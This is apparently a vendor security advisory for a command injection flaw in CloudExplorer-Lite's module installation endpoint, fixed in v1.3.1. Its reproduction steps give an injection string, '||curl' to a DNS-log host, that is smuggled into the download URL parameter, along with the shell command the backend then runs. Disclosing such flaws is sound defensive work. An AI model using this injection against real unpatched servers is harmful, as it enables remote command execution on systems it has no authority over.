Impact

Command injection vulnerability in installation function in module management.

The reproduction steps are as follows:

1. Installation function in module management: Install method in ModuleManageController. The address is as follows: https://github.com/CloudExplorer-Dev/CloudExplorer-Lite/blob/v1.3.0/framework/management-center/backend/src/main/java/com/fit2cloud/controller/ModuleManageController.java

2. Download the installation package from the specified URL using the updateModule function in run core. sh to complete the installation.

3. The updateModule function in run core. sh is as follows. Due to the unfiltered URL, the following string can be passed in to cause command injection.

||Curl http://wwww.aa.com

4. Finally, the updateModule will execute the following command:

Curl - SL | | curl http://wwww.aa.com -O/opt/cloudexplorer/downloads/$_ File | | exit 1

5. Call this interface to download_ URL parameter passed in | | curl http://wwww.aa.com , have the backend host execute curl http://wwww.aa.com , set here http://wwww.aa.com Is the dnslog address.
   

6. After sending the request, dnslog successfully accepted the request, proving that the backend host successfully executed the command curl http://wwww.aa.com

Affected versions: <= 1.3.0.

Patches

The vulnerability has been fixed in v1.3.1.

Workarounds

It is recommended to upgrade the version to v1.3.1.

References

If you have any questions or comments about this advisory:

Open an issue in https://github.com/CloudExplorer-Dev/CloudExplorer-Lite
Email us at xin.bai@fit2cloud.com